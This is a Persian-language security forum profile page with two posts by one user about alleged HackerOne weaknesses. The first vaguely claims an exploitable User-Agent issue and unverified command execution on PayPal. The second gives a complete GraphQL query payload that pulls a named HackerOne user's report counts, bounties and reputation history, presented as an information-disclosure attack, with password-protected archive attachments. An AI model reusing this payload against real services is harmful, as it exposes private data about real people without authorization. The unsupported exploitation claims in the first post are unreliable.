رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Und3rgr0und

New Member
  • تعداد ارسال ها

    2
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

0 Neutral

درباره Und3rgr0und

  • درجه
    متخصص امنیت
  • تاریخ تولد ۹۰/۰۱/۰۱

Converted

  • Name
    Anonymous
  • Main os
    Windows
  • Programming language
    خیر
  1. باسلام در این آموزش شمارو با نحوه ناامن بودن User-Agent سایت hackerone آشنا می کنم ، اگر قبلا مراجعه کرده اید میدونید این سایت از نظر امنیتی بالایی برخورداره و کاربرای زیادی روزانه مراجعه می کنند پس خود سایت هم دارای ضعف هایی است یکی از این موارد همین agent اون هست مهاجم اگر پرم صفحه ای دیگری از اونو پیدا کنه که user agnet اون در دسترس باشه میتونه اون صفحه رو ناامنتر کنه و دسترسی بیشتری برای کارهاش پیدا کنه ، برای مثال من روی Paypal همچنین موردی رو بر خوردم و با کمی تغییرات در صفحه اون تونستم دستورات بیشتری رو run کنم پس این موارد رو مدنظر داشته باشین. پسورد : iran-cyber.net 20190524_234103.rar
  2. باسلام مدتهاست که فعالیت نمیکنم ولی با این حال برای یادگیری دوستان که در زمینه بانتی فعالن آموزش های لازمه رو بذارم که توانایی خودشونو محک بزنن . در این خصوص سایت Hackerone با GraphQL در حال اجراست و باتوجه به خطای اون میتونی مقادیر مختلفی رو برای مهاجم نمایش بده حال در رسته Information Disclosure قرار میگیره در response خروجی میتوین موارد مختلفی رو ببینین Payload : {"query":"query Relay_query_router($first_0:Int!,$last_5:Int!,$last_6:Int!,$order_by_1:TeamOrderInput!,$where_2:FiltersTeamFilterInput!,$size_3:ProfilePictureSizes!,$size_8:ProfilePictureSizes!,$where_4:FiltersReportFilterInput!,$state_7:[invitationStateEnum]!) {query {id,...F2}} fragment F0 on User {_soft_launch_invitations2KlypH:soft_launch_invitations(state:$state_7) {total_count},id} fragment F1 on User {username,signal,reputation,impact,_profile_picture2rz4nb:profile_picture(size:$size_8),id} fragment F2 on Query {_teams1b6GWk:teams(first:$first_0,order_by:$order_by_1,where:$where_2) {edges {node {handle,name,_profile_picture1Fh783:profile_picture(size:$size_3),number_of_valid_reports_for_user,bounty_earned_for_user,currency,id},cursor},pageInfo {hasNextPage,hasPreviousPage}},user(username:\"jobert\") {id,username,reputation,_reports4B8BTM:reports(where:$where_4) {total_count},bounties {total_amount},bounties {_group_by_last_months16tviM:group_by_last_months(last:$last_5) {label,value}},reports {_group_by_resolved_last_months46VDjn:group_by_resolved_last_months(last:$last_5) {label,value}},_reputations_grouped_by_last_months41aZOE:reputations_grouped_by_last_months(last:$last_6) {label,value},...F0,...F1},id}","variables":{"first_0":5,"last_5":6,"last_6":7,"order_by_1":{"field":"bounty_earned_by_user","direction":"DESC"},"where_2":{"_or":[{"_and":[{"whitelisted_hackers":{"is_me":true}},{"state":{"_eq":"soft_launched"}}]},{"_and":[{"reporters":{"is_me":true}},{"state":{"_eq":"public_mode"}}]}]},"size_3":"medium","size_8":"large","where_4":{"substate":{"_eq":"resolved"}},"state_7":"open"}} بر روی کاربر jobert تست شد میبینید که خروجی Total_Count برابر 45 است. پسورد : iran-cyber.net Displays the total count of user reports in Hackerone via GraphQL.part01.rar Displays the total count of user reports in Hackerone via GraphQL.part02.rar Displays the total count of user reports in Hackerone via GraphQL.part03.rar Displays the total count of user reports in Hackerone via GraphQL.part04.rar Displays the total count of user reports in Hackerone via GraphQL.part05.rar

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...